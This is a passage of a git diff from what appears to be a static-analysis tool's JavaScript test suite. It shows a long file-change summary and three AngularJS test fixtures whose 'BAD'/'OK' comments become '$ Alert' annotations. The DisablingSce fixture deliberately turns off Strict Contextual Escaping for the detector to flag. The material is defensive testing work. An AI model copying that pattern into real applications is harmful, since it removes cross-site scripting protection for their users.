| 2 +- .../UnstableCyclicImport/exportCycleA.ts | 2 +- .../UnstableCyclicImport/exportCycleB.ts | 2 +- .../UnstableCyclicImport/safeA.ts | 2 +- .../UnstableCyclicImport/safeB.ts | 2 +- .../UnstableCyclicImport/typeA.ts | 2 +- .../Declarations/UnusedParameter/istype.ts | 4 +- .../UnusedParameter/parameter_field.ts | 4 +- .../UnusedParameter/thisparameter.ts | 2 +- .../Declarations/UnusedParameter/tst.js | 16 +- .../Declarations/UnusedParameter/tst2.js | 13 +- .../UnusedVariable/Babelrc/importPragma.jsx | 2 +- .../UnusedVariable/UnusedIndexVariable.js | 2 +- .../Declarations/UnusedVariable/decorated.ts | 10 +- .../Declarations/UnusedVariable/externs.js | 5 +- .../UnusedVariable/importWithoutPragma.jsx | 2 +- .../Declarations/UnusedVariable/importtype.ts | 4 +- .../Declarations/UnusedVariable/interTypes.ts | 2 +- .../UnusedVariable/namespaceImportAsType.ts | 6 +- .../Declarations/UnusedVariable/node.js | 2 +- .../Declarations/UnusedVariable/react-jsx.js | 2 +- .../UnusedVariable/require-react-1.js | 2 +- .../UnusedVariable/require-react-2.js | 2 +- .../UnusedVariable/require-react-3.js | 2 +- .../require-react-in-other-scope.js | 2 +- .../Declarations/UnusedVariable/thisparam.ts | 2 +- .../typeInTemplateLiteralTag.ts | 6 +- .../Declarations/UnusedVariable/typeoftype.ts | 8 +- .../Declarations/UnusedVariable/types.d.ts | 2 +- .../Declarations/UnusedVariable/underscore.js | 12 +- .../UnusedVariable/unusedShadowed.ts | 6 +- .../EnablingNodeIntegration.js | 12 +- .../Expressions/BitwiseSignCheck/tst.js | 12 +- .../Expressions/CompareIdenticalValues/tst.js | 17 +- .../Expressions/DuplicateProperty/tst.js | 14 +- .../Expressions/ExprHasNoEffect/es2015.js | 2 +- .../Expressions/ExprHasNoEffect/should.js | 2 +- .../Expressions/ExprHasNoEffect/try.js | 2 +- .../Expressions/ExprHasNoEffect/tst.js | 61 ++-- .../Expressions/ExprHasNoEffect/tst2.js | 3 +- .../HeterogeneousComparison/tst.js | 149 ++++----- .../ImplicitOperandConversion/tst.js | 65 ++-- 
.../Expressions/MissingAwait/tsTest.ts | 2 +- .../Expressions/MissingAwait/tst.js | 42 +-- .../MissingDotLengthInComparison.js | 14 +- .../Expressions/MisspelledIdentifier/tst.js | 31 +- .../Expressions/RedundantExpression/tst.js | 2 +- .../Expressions/SelfAssignment/jsdoc.js | 4 +- .../Expressions/SelfAssignment/tst.js | 15 +- .../Expressions/ShiftOutOfRange/tst.js | 4 +- .../Expressions/SuspiciousInvocation/eval.js | 8 +- .../SuspiciousInvocation/namespace.ts | 12 +- .../Expressions/SuspiciousInvocation/super.js | 5 +- .../export_equals_client.ts | 2 +- .../export_import_client.ts | 2 +- .../Expressions/SuspiciousPropAccess/tst2.ts | 2 +- .../SuspiciousPropAccess/typeassertion.ts | 4 +- .../SuspiciousPropAccess/typeoftype.ts | 4 +- .../UnboundEventHandlerReceiver/tst.js | 38 +-- .../UnclearOperatorPrecedence/tst.js | 14 +- .../UnclearOperatorPrecedence/tst.min.js | 2 +- .../UnknownDirective/UnknownDirective.html | 8 +- .../UnknownDirective/UnknownDirective.js | 66 ++-- .../global-module-definition.js | 2 +- .../module-environment-detection.js | 2 +- .../regression.js | 4 +- .../UnneededDefensiveProgramming/tst.js | 128 ++++---- .../UnneededDefensiveProgramming/tst2.js | 6 +- .../WhitespaceContradictsPrecedence/tst.js | 9 +- .../JSDoc/UndocumentedParameter/tst.js | 7 +- .../LanguageFeatures/BadTypeof/tst.js | 23 +- .../LanguageFeatures/EmptyArrayInit/tst.js | 14 +- .../ExpressionClosures/tst.js | 7 +- .../LanguageFeatures/IllegalInvocation/tst.js | 38 +-- .../LanguageFeatures/InconsistentNew/a1.js | 4 +- .../LanguageFeatures/InconsistentNew/a2.js | 4 +- .../InconsistentNew/arraycalls.js | 4 +- .../LanguageFeatures/InconsistentNew/tst.js | 8 +- .../LanguageFeatures/InvalidPrototype/tst.js | 18 +- .../LengthComparisonOffByOne/tst.js | 23 +- .../NonLinearPattern/ts-test.ts | 23 +- .../LanguageFeatures/NonLinearPattern/tst.js | 13 +- .../PropertyWriteOnPrimitive/tst.js | 18 +- .../SemicolonInsertion/tst.js | 14 +- .../SetterIgnoresParameter/tst.js | 12 +- 
.../LanguageFeatures/SetterReturn/tst.js | 7 +- .../SpuriousArguments/es2015.js | 10 +- .../SpuriousArguments/globals.js | 8 +- .../SpuriousArguments/thisparameter.ts | 4 +- .../LanguageFeatures/SpuriousArguments/tst.js | 55 ++-- .../StrictModeCallStackIntrospection/tst.js | 20 +- .../TemplateSyntaxInStringLiteral.js | 4 +- .../YieldInNonGenerator/tst.js | 3 +- .../query-tests/NodeJS/DubiousImport/main.js | 2 +- .../NodeJS/DubiousImport/multi_import.js | 6 +- .../query-tests/NodeJS/InvalidExport/tst.js | 4 +- .../query-tests/NodeJS/InvalidExport/tst2a.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst2b.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst2c.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst3.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst3b.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst4.js | 4 +- .../query-tests/NodeJS/InvalidExport/tst5.js | 2 +- .../query-tests/NodeJS/InvalidExport/tst6.js | 2 +- .../query-tests/NodeJS/MissingExports/tst.js | 12 +- .../UnresolvableImport/src/sub/subsub/tst.js | 4 +- .../NodeJS/UnresolvableImport/src/sub/tst.js | 4 +- .../NodeJS/UnresolvableImport/src/tst.js | 22 +- .../NodeJS/UnresolvableImport/tst.js | 2 +- .../Performance/NonLocalForIn/tst.js | 21 +- .../ReassignParameterAndUseArguments/tst.js | 7 +- .../React/InconsistentStateUpdate/tst.js | 32 +- .../tst.js | 58 ++-- .../undefined.js | 62 ++-- .../UnusedOrUndefinedStateProperty/unused.js | 26 +- .../RegExp/BackrefBeforeGroup/tst.js | 14 +- .../BackrefIntoNegativeLookahead/tst.js | 5 +- .../DuplicateCharacterInCharacterClass/tst.js | 4 +- .../RegExp/IdentityReplacement/tst.js | 26 +- .../query-tests/RegExp/MalformedRegExp/tst.js | 2 +- .../RegExp/RegExpAlwaysMatches/tst.js | 38 +-- .../query-tests/RegExp/UnboundBackref/tst.js | 17 +- .../RegExp/UnmatchableCaret/tst.js | 26 +- .../RegExp/UnmatchableDollar/tst.js | 31 +- .../tst-IncompleteHostnameRegExp.js | 6 +- .../IncompleteUrlSchemeCheck.js | 4 +- .../tst-IncompleteUrlSubstringSanitization.js | 4 +- 
.../CWE-020/IncorrectSuffixCheck/tst.js | 48 +-- .../CWE-020/MissingOriginCheck/tst.js | 6 +- .../tst-SemiAnchoredRegExp.js | 56 ++-- .../tst-UnanchoredUrlRegExp.js | 84 ++--- .../CWE-020/SuspiciousRegexpRange/tst.js | 34 +- .../CWE-022/TaintedPath/TaintedPath-es6.js | 3 +- .../CWE-022/TaintedPath/TaintedPath.js | 147 ++++----- .../TaintedPath/examples/TaintedPath.js | 3 +- .../TaintedPath/examples/TaintedPathGood.js | 2 +- .../CWE-022/TaintedPath/handlebars.js | 10 +- .../CWE-022/TaintedPath/normalizedPaths.js | 208 ++++++------ .../CWE-022/TaintedPath/other-fs-libraries.js | 48 +-- .../Security/CWE-022/TaintedPath/prettier.js | 4 +- .../CWE-022/TaintedPath/sharedlib-repro.js | 2 +- .../TaintedPath/tainted-access-paths.js | 20 +- .../TaintedPath/tainted-array-steps.js | 4 +- .../TaintedPath/tainted-promise-steps.js | 4 +- .../CWE-022/TaintedPath/tainted-require.js | 7 +- .../CWE-022/TaintedPath/tainted-sendFile.js | 21 +- .../TaintedPath/tainted-string-steps.js | 38 +-- .../Security/CWE-022/TaintedPath/torrents.js | 2 +- .../CWE-022/TaintedPath/typescript.ts | 15 +- .../Security/CWE-022/ZipSlip/ZipSlipBad.js | 2 +- .../Security/CWE-022/ZipSlip/ZipSlipGood.js | 4 +- .../query-tests/Security/CWE-073/routes.js | 2 +- .../test/query-tests/Security/CWE-073/tst.js | 16 +- .../test/query-tests/Security/CWE-073/tst2.js | 14 +- .../CWE-078/CommandInjection/actions.js | 4 +- .../CommandInjection/child_process-test.js | 60 ++-- .../CWE-078/CommandInjection/exec-sh.js | 2 +- .../CWE-078/CommandInjection/exec-sh2.js | 2 +- .../CWE-078/CommandInjection/execSeries.js | 2 +- .../CWE-078/CommandInjection/form-parsers.js | 14 +- .../CWE-078/CommandInjection/other.js | 40 +-- .../IndirectCommandInjection/actions.js | 10 +- ...ommand-line-parameter-command-injection.js | 76 ++--- .../second-order.js | 24 +- ...hell-command-injection-from-environment.js | 10 +- .../lib/isImported.js | 2 +- .../UnsafeShellCommandConstruction/lib/lib.js | 258 +++++++-------- .../lib/lib2.js | 4 +- 
.../lib/other.js | 2 +- .../lib/subLib/amdSub.js | 2 +- .../lib/subLib/index.js | 6 +- .../lib/subLib2/compiled-file.ts | 2 +- .../lib/subLib2/special-file.js | 2 +- .../lib/subLib3/my-file.ts | 2 +- .../lib/subLib4/subsub.js | 2 +- .../CWE-078/UselessUseOfCat/uselesscat.js | 98 +++--- .../CWE-079/DomBasedXss/addEventListener.js | 10 +- .../DomBasedXss/angular-tempate-url.js | 4 +- .../CWE-079/DomBasedXss/angular2-client.ts | 30 +- .../CWE-079/DomBasedXss/classnames.js | 16 +- .../Security/CWE-079/DomBasedXss/clipboard.ts | 12 +- .../CWE-079/DomBasedXss/custom-element.js | 2 +- .../Security/CWE-079/DomBasedXss/d3.js | 8 +- .../Security/CWE-079/DomBasedXss/dates.js | 34 +- .../CWE-079/DomBasedXss/dragAndDrop.ts | 10 +- .../Security/CWE-079/DomBasedXss/encodeuri.js | 2 +- .../DomBasedXss/event-handler-receiver.js | 2 +- .../Security/CWE-079/DomBasedXss/express.js | 5 +- .../Security/CWE-079/DomBasedXss/jquery.js | 42 +-- .../CWE-079/DomBasedXss/json-stringify.jsx | 8 +- .../CWE-079/DomBasedXss/jwt-server.js | 3 +- .../Security/CWE-079/DomBasedXss/jwt.js | 2 +- .../CWE-079/DomBasedXss/nodemailer.js | 4 +- .../CWE-079/DomBasedXss/optionalSanitizer.js | 22 +- .../CWE-079/DomBasedXss/pages/[id].jsx | 6 +- .../CWE-079/DomBasedXss/react-native.js | 4 +- .../CWE-079/DomBasedXss/react-use-context.js | 4 +- .../CWE-079/DomBasedXss/react-use-router.js | 10 +- .../CWE-079/DomBasedXss/react-use-state.js | 10 +- .../Security/CWE-079/DomBasedXss/sanitiser.js | 26 +- .../CWE-079/DomBasedXss/stored-xss.js | 16 +- .../DomBasedXss/string-manipulations.js | 22 +- .../tainted-url-suffix-arguments.js | 6 +- .../Security/CWE-079/DomBasedXss/tooltip.jsx | 10 +- .../Security/CWE-079/DomBasedXss/translate.js | 5 +- .../CWE-079/DomBasedXss/trusted-types.js | 6 +- .../Security/CWE-079/DomBasedXss/tst.js | 279 ++++++++-------- .../Security/CWE-079/DomBasedXss/tst3.js | 16 +- .../Security/CWE-079/DomBasedXss/typeahead.js | 2 +- .../various-concat-obfuscations.js | 20 +- 
.../Security/CWE-079/ExceptionXss/ajv.js | 4 +- .../CWE-079/ExceptionXss/exception-xss.js | 54 +-- .../CWE-079/ReflectedXss/ReflectedXss.js | 47 ++- .../ReflectedXss/ReflectedXssContentTypes.js | 18 +- .../CWE-079/ReflectedXss/ReflectedXssGood.js | 14 +- .../CWE-079/ReflectedXss/ReflectedXssGood3.js | 8 +- .../Security/CWE-079/ReflectedXss/cookies.js | 2 +- .../CWE-079/ReflectedXss/formatting.js | 6 +- .../CWE-079/ReflectedXss/live-server.js | 4 +- .../Security/CWE-079/ReflectedXss/partial.js | 10 +- .../Security/CWE-079/ReflectedXss/promises.js | 4 +- .../Security/CWE-079/ReflectedXss/tst2.js | 32 +- .../Security/CWE-079/ReflectedXss/tst3.js | 4 +- .../StoredXss/xss-through-filenames.js | 8 +- .../CWE-079/StoredXss/xss-through-torrent.js | 2 +- .../UnsafeHtmlConstruction/jquery-plugin.js | 6 +- .../UnsafeHtmlConstruction/lib/src/MyNode.ts | 2 +- .../UnsafeHtmlConstruction/lib2/index.ts | 6 +- .../UnsafeHtmlConstruction/lib2/src/MyNode.ts | 2 +- .../CWE-079/UnsafeHtmlConstruction/main.js | 42 +-- .../CWE-079/UnsafeHtmlConstruction/typed.ts | 6 +- .../unsafe-jquery-plugin.js | 96 +++--- .../Security/CWE-079/XssThroughDom/angular.ts | 14 +- .../Security/CWE-079/XssThroughDom/forms.js | 24 +- .../CWE-079/XssThroughDom/xss-through-dom.js | 84 ++--- .../CWE-089/local-threat-source/test.js | 2 +- .../Security/CWE-089/typed/typedClient.ts | 6 +- .../Security/CWE-089/untyped/graphql.js | 26 +- .../CWE-089/untyped/html-sanitizer.js | 2 +- .../CWE-089/untyped/json-schema-validator.js | 16 +- .../Security/CWE-089/untyped/koarouter.js | 2 +- .../Security/CWE-089/untyped/ldap.js | 14 +- .../CWE-089/untyped/marsdb-flow-to.js | 3 +- .../Security/CWE-089/untyped/marsdb.js | 3 +- .../Security/CWE-089/untyped/minimongo.js | 3 +- .../Security/CWE-089/untyped/mongodb.js | 31 +- .../CWE-089/untyped/mongodb_bodySafe.js | 5 +- .../Security/CWE-089/untyped/mongoose.js | 138 ++++---- .../CWE-089/untyped/mongooseJsonParse.js | 3 +- .../CWE-089/untyped/mongooseModelClient.js | 6 +- 
.../Security/CWE-089/untyped/mysql.js | 6 +- .../CWE-089/untyped/pg-promise-types.ts | 2 +- .../Security/CWE-089/untyped/pg-promise.js | 48 +-- .../Security/CWE-089/untyped/redis.js | 26 +- .../Security/CWE-089/untyped/tst2.js | 5 +- .../Security/CWE-089/untyped/tst3.js | 4 +- .../CodeInjection/NoSQLCodeInjection.js | 8 +- .../Security/CWE-094/CodeInjection/actions.js | 2 +- .../CWE-094/CodeInjection/angularjs.js | 42 +-- .../CodeInjection/bad-code-sanitization.js | 22 +- .../Security/CWE-094/CodeInjection/express.js | 29 +- .../CWE-094/CodeInjection/lib/index.js | 28 +- .../Security/CWE-094/CodeInjection/module.js | 4 +- .../CWE-094/CodeInjection/react-native.js | 4 +- .../CWE-094/CodeInjection/template-sinks.js | 28 +- .../Security/CWE-094/CodeInjection/tst.js | 33 +- .../CWE-094/CodeInjection/webix/webix.html | 6 +- .../CWE-094/CodeInjection/webix/webix.js | 6 +- .../UnsafeDynamicMethodAccess/example.js | 2 +- .../CWE-094/UnsafeDynamicMethodAccess/tst.js | 10 +- .../Security/CWE-1004/tst-httpOnly.js | 74 ++--- .../Security/CWE-116/BadTagFilter/tst.js | 44 +-- .../Security/CWE-116/DoubleEscaping/tst.js | 6 +- .../UnsafeHtmlExpansion.js | 24 +- .../tst-multi-character-sanitization.js | 119 ++++--- .../CWE-116/IncompleteSanitization/tst.js | 214 ++++++------ .../Security/CWE-117/logInjectionBad.js | 46 +-- .../Security/CWE-117/logInjectionGood.js | 10 +- .../Security/CWE-1275/tst-sameSite.js | 30 +- .../test/query-tests/Security/CWE-134/tst.js | 44 +-- .../test/query-tests/Security/CWE-178/tst.js | 14 +- .../Security/CWE-200/bufferRead.js | 3 +- .../Security/CWE-200/express-send-file.js | 2 +- .../Security/CWE-200/googlecompiler.js | 5 +- .../query-tests/Security/CWE-200/lib/tst.js | 6 +- .../Security/CWE-200/private-file-exposure.js | 26 +- .../Security/CWE-200/readFileSync.js | 3 +- .../Security/CWE-200/readStreamRead.js | 3 +- .../query-tests/Security/CWE-200/request.js | 4 +- .../Security/CWE-200/sentAsHeaders.js | 4 +- .../Security/CWE-201/PostMessageStar2.js 
| 8 +- .../test/query-tests/Security/CWE-209/node.js | 4 +- .../test/query-tests/Security/CWE-209/tst.js | 12 +- .../test/query-tests/Security/CWE-295/tst.js | 44 +-- .../Security/CWE-312/CleartextStorage.js | 3 +- .../Security/CWE-312/CleartextStorageGood.js | 2 +- .../Security/CWE-312/build-leaks.js | 14 +- .../query-tests/Security/CWE-312/passwords.js | 124 +++---- .../Security/CWE-312/tst-angularjs.js | 14 +- .../test/query-tests/Security/CWE-326/tst.js | 38 +-- .../Security/CWE-327/bad-random.js | 42 +-- .../test/query-tests/Security/CWE-327/tst.js | 14 +- .../test/query-tests/Security/CWE-338/tst.js | 52 +-- .../test/query-tests/Security/CWE-346/tst.js | 22 +- .../query-tests/Security/CWE-347/bad-jwt.js | 8 +- .../Security/CWE-352/csurf_api_example.js | 2 +- .../Security/CWE-352/csurf_example.js | 4 +- .../query-tests/Security/CWE-352/fastify.js | 2 +- .../query-tests/Security/CWE-352/fastify2.js | 2 +- .../Security/CWE-352/lusca_example.js | 6 +- .../test/query-tests/Security/CWE-352/tst.js | 2 +- .../test/query-tests/Security/CWE-367/tst.js | 12 +- .../CWE-377/insecure-temporary-file.js | 16 +- .../test/query-tests/Security/CWE-384/tst.js | 6 +- .../DeepObjectResourceExhaustion/tst.js | 2 +- .../Security/CWE-400/ReDoS/jsonschema.js | 6 +- .../Security/CWE-400/ReDoS/lib/closure.js | 2 +- .../Security/CWE-400/ReDoS/lib/indirect.js | 2 +- .../Security/CWE-400/ReDoS/lib/lib.js | 14 +- .../CWE-400/ReDoS/lib/moduleLib/moduleLib.js | 2 +- .../ReDoS/lib/otherLib/js/src/index.js | 2 +- .../Security/CWE-400/ReDoS/lib/snapdragon.js | 6 +- .../CWE-400/ReDoS/lib/subLib4/factory.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/feature.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/main.js | 2 +- .../CWE-400/ReDoS/lib/subLib5/subclass.js | 2 +- .../CWE-400/ReDoS/lib/subLib6/index.js | 2 +- .../CWE-400/ReDoS/lib/sublib/factory.js | 2 +- .../CWE-400/ReDoS/polynomial-redos.js | 196 +++++------ .../query-tests/Security/CWE-400/ReDoS/tst.js | 308 +++++++----------- 
.../CWE-400/RemovePropertyInjection/tst.js | 12 +- .../RemovePropertyInjection/tstNonExpr.js | 4 +- .../test/query-tests/Security/CWE-502/tst.js | 30 +- .../test/query-tests/Security/CWE-506/tst.js | 8 +- .../CWE-522-DecompressionBombs/fflate.js | 5 +- .../test/query-tests/Security/CWE-598/tst.js | 12 +- .../CWE-601/ClientSideUrlRedirect/react.js | 8 +- .../ClientSideUrlRedirect/regexp-exec.js | 16 +- .../ClientSideUrlRedirect/sanitizer.js | 24 +- .../CWE-601/ClientSideUrlRedirect/tst.js | 11 +- .../CWE-601/ClientSideUrlRedirect/tst10.js | 12 +- .../CWE-601/ClientSideUrlRedirect/tst11.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst13.js | 40 +-- .../CWE-601/ClientSideUrlRedirect/tst14.js | 4 +- .../CWE-601/ClientSideUrlRedirect/tst15.js | 22 +- .../CWE-601/ClientSideUrlRedirect/tst2.js | 3 +- .../CWE-601/ClientSideUrlRedirect/tst3.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst4.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst5.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst6.js | 9 +- .../CWE-601/ClientSideUrlRedirect/tst7.js | 6 +- .../CWE-601/ClientSideUrlRedirect/tst8.js | 2 +- .../CWE-601/ClientSideUrlRedirect/tst9.js | 3 +- .../CWE-601/ClientSideUrlRedirect/typed.ts | 8 +- .../ServerSideUrlRedirect.js | 3 +- .../ServerSideUrlRedirectGood.js | 2 +- .../ServerSideUrlRedirectGood2.js | 2 +- .../CWE-601/ServerSideUrlRedirect/express.js | 82 ++--- .../CWE-601/ServerSideUrlRedirect/koa.js | 16 +- .../CWE-601/ServerSideUrlRedirect/next.ts | 2 +- .../CWE-601/ServerSideUrlRedirect/node.js | 14 +- .../ServerSideUrlRedirect/react-native.js | 4 +- .../query-tests/Security/CWE-611/closure.js | 2 +- .../query-tests/Security/CWE-611/domparser.js | 8 +- .../query-tests/Security/CWE-611/expat.js | 2 +- .../query-tests/Security/CWE-611/libxml.js | 2 +- .../Security/CWE-611/libxml.noent.js | 12 +- .../Security/CWE-614/tst-cleartextCookie.js | 62 ++-- .../test/query-tests/Security/CWE-640/tst.js | 8 +- .../Security/CWE-643/XpathInjectionBad.js | 3 +- 
.../Security/CWE-643/XpathInjectionGood.js | 2 +- .../test/query-tests/Security/CWE-643/tst.js | 8 +- .../test/query-tests/Security/CWE-643/tst2.js | 4 +- .../Security/CWE-693/InsecureHelmetBad.js | 4 +- .../Security/CWE-693/InsecureHelmetGood.js | 2 +- .../Security/CWE-730/RegExpInjection.js | 61 ++-- .../Security/CWE-730/RegExpInjectionGood.js | 2 +- .../Security/CWE-730/server-crash.js | 46 +-- .../test/query-tests/Security/CWE-730/tst.js | 2 +- .../CWE-754/UnsafeDynamicMethodAccess.js | 10 +- .../CWE-754/UnvalidatedDynamicMethodCall2.js | 2 +- .../CWE-754/UnvalidatedDynamicMethodCall3.js | 2 +- .../UnvalidatedDynamicMethodCallGood.js | 2 +- .../UnvalidatedDynamicMethodCallGood3.js | 2 +- .../UnvalidatedDynamicMethodCallGood4.js | 4 +- .../test/query-tests/Security/CWE-754/tst.js | 30 +- .../Security/CWE-770/MissingRateLimit/tst.js | 44 +-- .../Security/CWE-770/MissingRateLimit/tst2.ts | 2 +- .../Security/CWE-770/MissingRateLimit/tst3.js | 2 +- .../Security/CWE-770/MissingRateLimit/tst4.js | 2 +- .../ResourceExhaustion_timeout.js | 2 +- .../ResourceExhaustion_timeout_fixed.js | 2 +- .../ResourceExhaustion/resource-exhaustion.js | 96 +++--- .../query-tests/Security/CWE-776/closure.js | 3 +- .../query-tests/Security/CWE-776/domparser.js | 9 +- .../query-tests/Security/CWE-776/expat.js | 2 +- .../query-tests/Security/CWE-776/jquery.js | 3 +- .../query-tests/Security/CWE-776/libxml.js | 3 +- .../Security/CWE-776/libxml.noent.js | 3 +- .../Security/CWE-776/libxml.sax.js | 2 +- .../Security/CWE-776/libxml.saxpush.js | 2 +- .../Security/CWE-798/HardcodedCredentials.js | 160 ++++----- .../__tests__/HardcodedCredentialsDemo.js | 8 +- .../Security/CWE-807/example_bypass.js | 9 +- .../tst-different-kinds-comparison-bypass.js | 18 +- .../test/query-tests/Security/CWE-807/tst.js | 42 +-- .../Security/CWE-829/insecure-download.js | 20 +- .../DynamicCreationOfUntrustedSourceUse.html | 20 +- .../StaticCreationOfUntrustedSourceUse.html | 21 +- 
.../Security/CWE-834/LoopBoundInjectionBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitBad.js | 8 +- .../CWE-834/LoopBoundInjectionExitGood.js | 8 +- .../CWE-834/LoopBoundInjectionGood.js | 8 +- .../CWE-834/LoopBoundInjectionLodash.js | 2 +- .../LoopBoundInjectionObviousLengthCheck.js | 2 +- .../LoopBoundInjectionObviousNullPointer.js | 10 +- ...jectionObviousNullPointerInPreviousLoop.js | 4 +- .../test/query-tests/Security/CWE-843/tst.js | 66 ++-- .../test/query-tests/Security/CWE-912/tst.js | 10 +- .../PrototypePollutingAssignment/lib.js | 30 +- .../otherlib/src/otherlibimpl.js | 2 +- .../sublib/other.js | 2 +- .../sublib/sub.js | 2 +- .../PrototypePollutingAssignment/tst.js | 60 ++-- .../path-assignment.js | 10 +- .../PrototypePollutingFunction/tests.js | 92 +++--- .../angularmerge.js | 2 +- .../src-non-vulnerable-lodash/tst.js | 2 +- .../src-vulnerable-lodash/tst.js | 8 +- .../webix/webix.html | 4 +- .../webix/webix.js | 4 +- .../test/query-tests/Security/CWE-916/tst.js | 8 +- .../Security/CWE-918/clientSide.js | 14 +- .../Security/CWE-918/serverSide.js | 54 +-- .../Statements/EphemeralLoop/tst.js | 10 +- .../Statements/IgnoreArrayResult/tst.js | 4 +- .../Statements/ImplicitReturn/tst.js | 25 +- .../InconsistentLoopOrientation/tst.js | 13 +- .../LoopIterationSkippedDueToShifting/tst.js | 12 +- .../Statements/NestedLoopsSameVariable/tst.js | 5 +- .../Statements/ReturnAssignsLocal/tst.js | 18 +- .../Statements/ReturnOutsideFunction/tst.js | 3 +- .../tst.js | 41 ++- .../UnreachableStatement/typealias.ts | 2 +- .../UseOfReturnlessFunction/tst.html | 2 +- .../Statements/UseOfReturnlessFunction/tst.js | 30 +- .../UseOfReturnlessFunction/tst2.ts | 2 +- .../UselessComparisonTest/constant.js | 4 +- .../UselessComparisonTest/defaults.js | 6 +- .../UselessComparisonTest/implicitReturn.js | 2 +- .../UselessConditional/UselessConditional.js | 56 ++-- .../UselessConditionalGood.js | 38 +-- javascript/ql/test/query-tests/Vue/tst.js | 16 +- 
.../external/DuplicateFunction/d/tst.js | 2 +- 536 files changed, 4420 insertions(+), 4774 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js index d8616c9e2399..58b700a4c3f2 100644 --- a/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DeadAngularJSEventListener/tst.js 
@@ -1,50 +1,50 @@ angular.module('myModule', []) .controller('MyController', function($scope) { - $scope.$on('destroy', cleanup); // BAD + $scope.$on('destroy', cleanup); // $ Alert }) .controller('MyController', ["$scope", function(s) { - s.$on('destroy', cleanup); // BAD + s.$on('destroy', cleanup); // $ Alert }]) .controller('MyController', function($scope) { var destroy = 'destroy'; - $scope.$on(destroy, cleanup); // BAD + $scope.$on(destroy, cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$destroy', cleanup); // GOOD + $scope.$on('$destroy', cleanup); }) .controller('MyController', function($scope) { $scope.$emit('foo'); - $scope.$on('foo', cleanup); // GOOD + $scope.$on('foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('bar', cleanup); // BAD + $scope.$on('bar', cleanup); // $ Alert }) .controller('MyController', function($scope) { - $scope.$on('$locationChangeStart', cleanup); // OK + $scope.$on('$locationChangeStart', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib1.foo', cleanup); // OK + $scope.$on('lib1.foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('lib2:foo', cleanup); // OK + $scope.$on('lib2:foo', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('onClick', cleanup); // OK + $scope.$on('onClick', cleanup); }) .controller('MyController', function($scope) { function f($scope){ $scope.$emit('probablyFromUserCode1') } - $scope.$on('probablyFromUserCode1', cleanup); // OK + $scope.$on('probablyFromUserCode1', cleanup); }) .controller('MyController', function($scope) { function f($scope){ var scope = $scope; scope.$emit('probablyFromUserCode2') } - $scope.$on('probablyFromUserCode2', cleanup); // OK + $scope.$on('probablyFromUserCode2', cleanup); }) .controller('MyController', function($scope) { - $scope.$on('event-from-AngularJS-expression', cleanup); // GOOD + $scope.$on('event-from-AngularJS-expression', 
cleanup); }) ; diff --git a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js index c60a937b4c45..3afff0e3a50b 100644 --- a/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js +++ b/javascript/ql/test/query-tests/AngularJS/DependencyMismatch/tst.js @@ -1,36 +1,36 @@ angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // NOT OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep3, dep2) {}]); // $ Alert angular.module('app2') - .directive('mydirective', [ '$compile', function($compile, $http) { // NOT OK + .directive('mydirective', [ '$compile', function($compile, $http) { // $ Alert // ... }]); angular.module('app1', []) - .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); // OK + .run(['dep1', 'dep2', 'dep3', function(dep1, dep2, dep3) {}]); angular.module('app2') - .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // OK + .directive('mydirective', [ '$compile', '$http', function($compile, $http) { // ... }]); angular.module('app3', []) - .run(function(dep1, dep3) {}); // OK + .run(function(dep1, dep3) {}); angular.module('app4') - .directive('mydirective', function($compile, $http) { // OK + .directive('mydirective', function($compile, $http) { // ... }); angular.module('app5') - .directive('mydirective', [ 'fully.qualified.name', function(name) { // OK + .directive('mydirective', [ 'fully.qualified.name', function(name) { // ... }]) angular.module('app6') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js index 2ef8930246f9..312af00754e6 100644 --- a/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js 
+++ b/javascript/ql/test/query-tests/AngularJS/DisablingSce/DisablingSce.js @@ -1,17 +1,17 @@ angular.module('app', []) .config(function($sceProvider) { - $sceProvider.enabled(false); // BAD + $sceProvider.enabled(false); // $ Alert }) .config(['otherProvider', function($sceProvider) { - $sceProvider.enabled(false); // OK + $sceProvider.enabled(false); }]) .config(['$sceProvider', function(x) { - x.enabled(false); // BAD + x.enabled(false); // $ Alert }]) .config(function($sceProvider) { - $sceProvider.enabled(true); // OK + $sceProvider.enabled(true); }) .config(function($sceProvider) { var x = false; - $sceProvider.enabled(x); // BAD + $sceProvider.enabled(x); // $ Alert }); diff --git a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js index 51dbd1f76d48..c3855f207c04 100644 --- a/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js +++ b/javascript/ql/test/query-tests/AngularJS/IncompatibleService/angular-incompatible-service.js 
